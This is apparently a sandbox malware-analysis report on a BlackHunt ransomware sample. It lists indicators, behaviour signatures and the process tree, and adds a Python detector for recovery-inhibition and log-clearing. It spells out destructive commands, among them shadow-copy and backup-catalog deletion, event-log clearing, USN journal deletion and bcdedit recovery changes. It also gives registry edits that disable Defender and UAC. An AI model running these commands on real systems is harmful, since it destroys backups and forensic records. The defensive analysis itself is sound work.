Analysis
max time kernel: 130s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system
submitted: 18/01/2024, 22:48
Static task: static1
Behavioral task: behavioral1
  Sample: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
  Resource: win10v2004-20231215-en
General
Target: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
Size: 707KB
MD5: 9297df899833e2582ec6aadd300cdaec
SHA1: 6bf62166c0f4d1f1762f3942e858883f39afba1d
SHA256: 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3
SHA512: 83f277c9cb113f1c8e56dea6ddd5e1f90c10832894bf81743f9d3797786bfe39424533bfe84c6194c35712fc41466778b07b93e7a3e7e4779f4262d019dea781
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza128yvnh:6uaTmkZJ+naie5OTamgEoKxLWFch
Malware Config
Extracted from: F:\#BlackHunt_ReadMe.hta
  http-equiv="x-ua-compatible"
  URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent per-volume NTFS log of file and directory changes. Deleting it (fsutil usn deletejournal) removes a record that forensic timelines depend on; it is an anti-forensics step, not a normal administrative action.
  pid 8440  fsutil.exe
  pid 7844  fsutil.exe

Modifies Windows Defender Real-time Protection settings (heading not preserved in the extracted page; name taken from the process tree below)
  Key created      \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"  reg.exe

UAC bypass (heading not preserved in the extracted page; name taken from the process tree below)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
Clears Windows event logs (1 TTPs, 5 IoCs)
  pid 5296  wevtutil.exe
  pid 5976  wevtutil.exe
  pid 6076  wevtutil.exe
  pid 3400  wevtutil.exe
  pid 5416  wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
  pid 7900  bcdedit.exe
  pid 5192  bcdedit.exe
  pid 7944  bcdedit.exe
  pid 8132  bcdedit.exe

Renames multiple (3361) files with added filename extension
Mass renaming with a new extension is the file-system footprint of ransomware encryption; it is consistent with the .Hunt2 file class the sample registers (see "Modifies registry class" below).

Deletes backup catalog (heading missing from the extracted page; inferred from the two wbadmin.exe processes it lists)
  pid 1488  wbadmin.exe
  pid 7264  wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
  Key value queried  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation  cmd.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"  reg.exe

Checks whether UAC is enabled (heading not preserved in the extracted page; name taken from the process tree below)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe

Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe (23 entries): \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
  File opened (read-only) by vssadmin.exe (2 entries): \??\F:
  File opened (read-only) by fsutil.exe (2 entries): \??\M: \??\F:
The sample itself probes every drive letter except C:, D: and F:; F:, the drive the ransom note in Malware Config was extracted from, is touched by vssadmin.exe and fsutil.exe.

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 3  ip-api.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Set value (str)  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg"  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
Drops file in Program Files directory (64 IoCs)
All 64 entries below are by 26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe. "File created" entries are ransom notes (#BlackHunt_ReadMe.hta / .txt) and per-directory key files (#BlackHunt_Private.key); "File opened for modification" entries are files being encrypted.
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#BlackHunt_ReadMe.hta
  File created  C:\Program Files\Java\jdk-1.8\jre\lib\security\#BlackHunt_ReadMe.hta
  File created  C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_ReadMe.txt
  File created  C:\Program Files\VideoLAN\VLC\plugins\logger\#BlackHunt_ReadMe.hta
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_closereview_18.svg
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#BlackHunt_ReadMe.txt
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\charsets.jar
  File opened for modification  C:\Program Files\Java\jdk-1.8\legal\jdk\lcms.md
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\#BlackHunt_Private.key
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan-2x.png
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#BlackHunt_ReadMe.hta
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\ui-strings.js
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\ui-strings.js
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\selector.js
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\ui-strings.js
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#BlackHunt_ReadMe.txt
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css
  File opened for modification  C:\Program Files\7-Zip\Lang\sl.txt
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#BlackHunt_Private.key
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-sl\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\#BlackHunt_ReadMe.txt
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\#BlackHunt_Private.key
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\#BlackHunt_ReadMe.hta
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x.cur
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\#BlackHunt_Private.key
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#BlackHunt_ReadMe.txt
  File created  C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\#BlackHunt_Private.key
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\he-il\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#BlackHunt_ReadMe.txt
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\ui-strings.js
  File created  C:\Program Files (x86)\Google\Update\Download\#BlackHunt_ReadMe.txt
  File opened for modification  C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected.svg
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\#BlackHunt_ReadMe.hta
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\close.svg
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#BlackHunt_Private.key
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\#BlackHunt_ReadMe.hta
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\main.css
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\#BlackHunt_ReadMe.txt
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#BlackHunt_ReadMe.hta
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\#BlackHunt_ReadMe.txt
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#BlackHunt_ReadMe.hta
  File created  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#BlackHunt_Private.key
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\jfr\default.jfc
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
  pid 17024  pid_target 16656  WerFault.exe  procid_target 289

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments. Note that all four reads here are by vds.exe (the Windows Virtual Disk Service), not by the sample, so they are more likely a side effect of the sample's volume and shadow-copy operations than sandbox detection.
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000  vds.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName  vds.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000  vds.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName  vds.exe

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 4632  schtasks.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid 7768   vssadmin.exe
  pid 16396  vssadmin.exe
  pid 6992   vssadmin.exe
  pid 7684   vssadmin.exe
  pid 7724   vssadmin.exe
  pid 7732   vssadmin.exe

Kills process with taskkill (1 IoCs)
  pid 16532  taskkill.exe

Modifies registry class (9 IoCs)
Registers .Hunt2 as a file extension with its own ProgID (Hunt2) and icon, so encrypted files display the ransomware's icon in Explorer.
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\  cmd.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"  reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\.Hunt2  reg.exe
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\  reg.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2  cmd.exe
  Key created      \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings  cmd.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid 8288  PING.EXE

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid 64  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe

Suspicious use of AdjustPrivilegeToken (24 IoCs)
  pid 64     26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
  pid 5812   vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  pid 8116   wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
  pid 5296   wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  pid 6076   wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  pid 5976   wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  pid 3400   wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  pid 5416   wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  pid 16532  taskkill.exe: SeDebugPrivilege
The sample's own set (SeBackup, SeRestore, SeTakeOwnership, SeSecurity) is what it needs to overwrite files regardless of their ACLs; vssvc.exe and wbengine.exe are the Volume Shadow Copy and Windows Backup services it drives.

Suspicious use of WriteProcessMemory (64 IoCs)
Each write is logged twice in the original report and is listed once here. Format: parent PID -> child PID (parent process, procid_target).
  64 -> 4968  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 89)
  64 -> 1512  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 91)
  64 -> 3404  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 93)
  64 -> 2988  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 95)
  4968 -> 1472  (cmd.exe, 97)
  64 -> 4772  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 99)
  1512 -> 4904  (cmd.exe, 100)
  3404 -> 4932  (cmd.exe, 173)
  2988 -> 5016  (cmd.exe, 102)
  64 -> 3176  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 103)
  64 -> 1404  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 106)
  4772 -> 4408  (cmd.exe, 109)
  64 -> 4744  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 107)
  64 -> 532  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 110)
  3176 -> 5048  (cmd.exe, 115)
  64 -> 3052  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 196)
  1404 -> 3944  (cmd.exe, 114)
  64 -> 3048  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 122)
  64 -> 1536  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 116)
  64 -> 2828  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 121)
  4744 -> 1428  (cmd.exe, 119)
  64 -> 4436  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 197)
  64 -> 3768  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 125)
  532 -> 4004  (cmd.exe, 127)
  64 -> 384  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 129)
  3052 -> 1796  (cmd.exe, 130)
  1536 -> 3352  (cmd.exe, 131)
  2828 -> 2408  (cmd.exe, 132)
  64 -> 4280  (26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe, 133)
  4436 -> 4180  (Conhost.exe, 135)
  3768 -> 860  (cmd.exe, 136)
  3048 -> 2760  (cmd.exe, 138)

System policy modification (1 TTPs, 3 IoCs)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System  26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe
EnableLUA = 0 turns UAC off at the next logon; EnableLinkedConnections = 1 makes drive letters mapped in the standard-user session visible to the elevated token, so an elevated encryptor can reach mapped network shares.

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
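The recovery-inhibition and log-clearing signatures above (fsutil USN journal deletion, wevtutil log clearing, vssadmin and wbadmin backup destruction, bcdedit recovery changes) are individually noisy; what makes them ransomware-grade is several of them fired by the same parent. The following detector, added here as an example and not code from tria.ge or from the sample, matches process-creation events against one rule per tool and correlates the hits by parent PID. The PIDs in SAMPLE_EVENTS come from the report, but the command lines are constructed (the page lists only tool names and PIDs for these processes) using the documented syntax of each tool, and the ATT&CK technique IDs are the author's mapping.

```python
"""Per-parent correlation of recovery-inhibition (T1490) and log-clearing
(T1070) command lines, as a sandbox or EDR process log would record them.

Added example; not code from tria.ge or from the sample.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_pid: int
    image: str      # image basename as a process-creation log records it
    cmdline: str


# (rule name, ATT&CK technique, image basename, regex over the command line).
# Technique IDs are the author's mapping, not taken from the report.
RULES = [
    ("usn_journal_deleted",    "T1070",     "fsutil.exe",   r"\busn\b.*\bdeletejournal\b"),
    ("eventlog_cleared",       "T1070.001", "wevtutil.exe", r"^\S+\s+(cl|clear-log)\b"),
    ("shadow_copies_deleted",  "T1490",     "vssadmin.exe", r"\bdelete\s+shadows\b"),
    ("shadow_storage_resized", "T1490",     "vssadmin.exe", r"\bresize\s+shadowstorage\b"),
    ("backup_catalog_deleted", "T1490",     "wbadmin.exe",  r"\bdelete\s+catalog\b"),
    ("boot_recovery_disabled", "T1490",     "bcdedit.exe",
     r"/set\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"),
]


def match_rules(events):
    """Return (rule, technique, pid, parent_pid) for every event a rule matches."""
    hits = []
    for ev in events:
        for name, technique, image, pattern in RULES:
            if ev.image.lower() == image and re.search(pattern, ev.cmdline, re.IGNORECASE):
                hits.append((name, technique, ev.pid, ev.parent_pid))
    return hits


def assess(events):
    """Correlate hits by parent PID.

    One vssadmin call can be legitimate administration; the ransomware pattern
    is a single parent spawning several distinct T1490 tools and also clearing
    logs (T1070).  Returns (hits, {parent_pid: verdict}).
    """
    hits = match_rules(events)
    by_parent = {}
    for name, technique, _pid, ppid in hits:
        by_parent.setdefault(ppid, set()).add((name, technique))
    verdicts = {}
    for ppid, pairs in by_parent.items():
        recovery = {n for n, t in pairs if t == "T1490"}
        logs = {n for n, t in pairs if t.startswith("T1070")}
        if len(recovery) >= 2 and logs:
            verdicts[ppid] = "ransomware-like: recovery inhibition plus log clearing"
        else:
            verdicts[ppid] = "suspicious: " + ", ".join(sorted(n for n, _ in pairs))
    return hits, verdicts


# Constructed process-creation events: PIDs from the report, command lines assumed.
SAMPLE_EVENTS = [
    ProcEvent(8440, 64, "fsutil.exe",   "fsutil usn deletejournal /D C:"),
    ProcEvent(5296, 64, "wevtutil.exe", "wevtutil cl Security"),
    ProcEvent(5976, 64, "wevtutil.exe", "wevtutil cl System"),
    ProcEvent(7768, 64, "vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(6992, 64, "vssadmin.exe", "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"),
    ProcEvent(1488, 64, "wbadmin.exe",  "wbadmin delete catalog -quiet"),
    ProcEvent(7900, 64, "bcdedit.exe",  "bcdedit /set {default} recoveryenabled no"),
    ProcEvent(5192, 64, "bcdedit.exe",  "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(8288, 64, "PING.EXE",     "ping 127.0.0.1 -n 3"),       # no rule fires
    ProcEvent(9001, 1234, "vssadmin.exe", "vssadmin list shadows"),    # benign admin use
]

if __name__ == "__main__":
    found, verdict = assess(SAMPLE_EVENTS)
    for h in found:
        print("%-24s %-9s pid=%-5d parent=%d" % h)
    for ppid, text in verdict.items():
        print("parent %d: %s" % (ppid, text))
```

The benign "vssadmin list shadows" under a different parent produces no verdict at all, and a lone "delete shadows" is reported as suspicious rather than ransomware-like; the escalation needs two distinct recovery-inhibition tools plus a log-clearing tool under one parent, which is exactly the shape of the signature cluster in this report.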
Processes (indented by depth in the process tree; each entry shows image path, PID, command line, then the signatures triggered by that process)

C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe (PID 64): "C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe"
  - UAC bypass
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  C:\Windows\System32\cmd.exe (PID 4968): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 1472): reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Modifies registry class
  C:\Windows\System32\cmd.exe (PID 1512): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 4904): reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class
  C:\Windows\System32\cmd.exe (PID 3404): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 4932): reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  C:\Windows\System32\cmd.exe (PID 2988): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 5016): reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class
